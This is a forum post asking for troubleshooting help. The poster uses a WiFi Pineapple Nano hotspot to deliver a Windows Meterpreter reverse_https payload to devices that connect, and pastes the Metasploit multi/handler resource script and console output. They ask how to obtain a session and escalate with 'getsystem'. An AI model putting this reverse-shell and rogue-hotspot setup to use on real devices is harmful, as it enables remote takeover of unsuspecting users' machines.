hanshaze Posted June 19, 2019 Share Posted June 19, 2019 Hi..... 1. On a Pi0w-P4wnP1-ALOA i run a https listener 2. in the Pineapple Nano Meterpreter webmodule i enter LHOST and LPORT of the listener..... 3. now i connect a 3rd device to the nano-hosted "openWiF" and surf to the landing page in a webbrowser.... 4. after a few seconds on the Pi Zero console that happens =[ metasploit v5.0.29-dev ] + -- --=[ 1898 exploits - 1068 auxiliary - 329 post ] + -- --=[ 547 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] [*] Processing /home/pi/.scripts/listen.rc for ERB directives. resource (/home/pi/.scripts/listen.rc)> use multi/handler resource (/home/pi/.scripts/listen.rc)> set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https resource (/home/pi/.scripts/listen.rc)> set LHOST xxx.xxx.xxx.xxx LHOST => xxx.xxx.xxx.xxx resource (/home/pi/.scripts/listen.rc)> set LPORT xxxx LPORT => xxxx resource (/home/pi/.scripts/listen.rc)> set ExitOnSession true ExitOnSession => true resource (/home/pi/.scripts/listen.rc)> set AutoVerifySession false AutoVerifySession => false resource (/home/pi/.scripts/listen.rc)> set AutoSystemInfo false AutoSystemInfo => false resource (/home/pi/.scripts/listen.rc)> set AutoLoadStdapi false AutoLoadStdapi => false resource (/home/pi/.scripts/listen.rc)> exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://xxx.xxx.xxx.xxx:xxxx And no more not less? 🤷♂️ My question is how to get an active meterpreter session to use stuff like "getuid" and "getsystem"! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.